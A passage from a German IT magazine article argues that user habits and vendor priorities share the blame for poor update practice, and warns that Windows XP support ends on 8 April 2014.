An diesem Verhalten des unbedarften Benutzers ist die IT-Branche jedoch selbst schuld. Wie oft hat die IT-Presse darüber berichtet, dass es ein Fehler war, auf "Ja" zu klicken? Wer einst beim "Loveletter" auf "Nein" klickte, der hatte kein Problem. Erst in der jüngeren Vergangenheit sind die Entwickler, beispielsweise von Googles Chrome, dazu übergegangen, die Updates immer und automatisch einzuspielen. Die Wahrscheinlichkeit, dass etwas nicht mehr ordentlich funktioniert, ist weitaus geringer, als die entstehenden Sicherheitsrisiken.

Andererseits trifft die Produkt-Manager und Marktstrategen eine nicht zu unterschätzende Mitschuld: Die ständige Erhöhung des Versionszählers sollte nicht darüber hinwegtäuschen, dass neue Features scheinbar höher in der Bedeutung sind, als die Erstellung von möglichst fehlerfreier Software.

Die Annahme, dass Windows XP schon vollkommen "out" ist und sich eigentlich kaum noch jemand dafür begeistern dürfte, ist leider ein Trugschluss. Trotz des überaus beeindruckenden Verkaufserfolgs von Windows 7 gelang es dem deutlich jüngeren Betriebssystem laut Wikipedia erst im Oktober 2011, das alte XP in Marktanteilen zu übertrumpfen. Man darf nicht vergessen, dass Netbooks auch im Jahr 2010 noch mit XP ausgeliefert wurden und dass in vielen Windows-7-Computern ein altes XP im "XP Mode" schlummert. Für all diese Geräte, seien sie nun physikalisch oder virtuell, gilt der 8.April 2014 als der letzte sichere Arbeitstag - und damit als der späteste Zeitpunkt für einen Wechsel. Zumindest sofern sich Microsoft nicht noch einmal gnädig zeigt - dies ist, nach immerhin 4548 Tagen Support, jedoch eher unwahrscheinlich. Kaum ein Hersteller bietet fast zwölfeinhalb Jahre Unterstützung für eines seiner Produkte an - ein Blick auf die Apple-Betriebssysteme zeigt da beispielsweise ein ganz anderes Bild.

© IDG / In Zusammenarbeit mit computerwoche.de
Leserkommentare

Leserkommentare (0)

Sie schreiben unter dem Namen:



Diskutieren Sie mit!

Damit Sie Artikel kommentieren können, müssen Sie sich einmalig registrieren — bereits registrierte Leser müssen zum Schreiben eines Kommentars eingeloggt sein. Beachten Sie unsere Diskussionsregeln, die Netiquette.

Homepage aktualisiert

Finden Sie jetzt neue aktuelle Informationen auf unserer Startseite

Wieder zur Homepage

Die Homepage wurde aktualisiert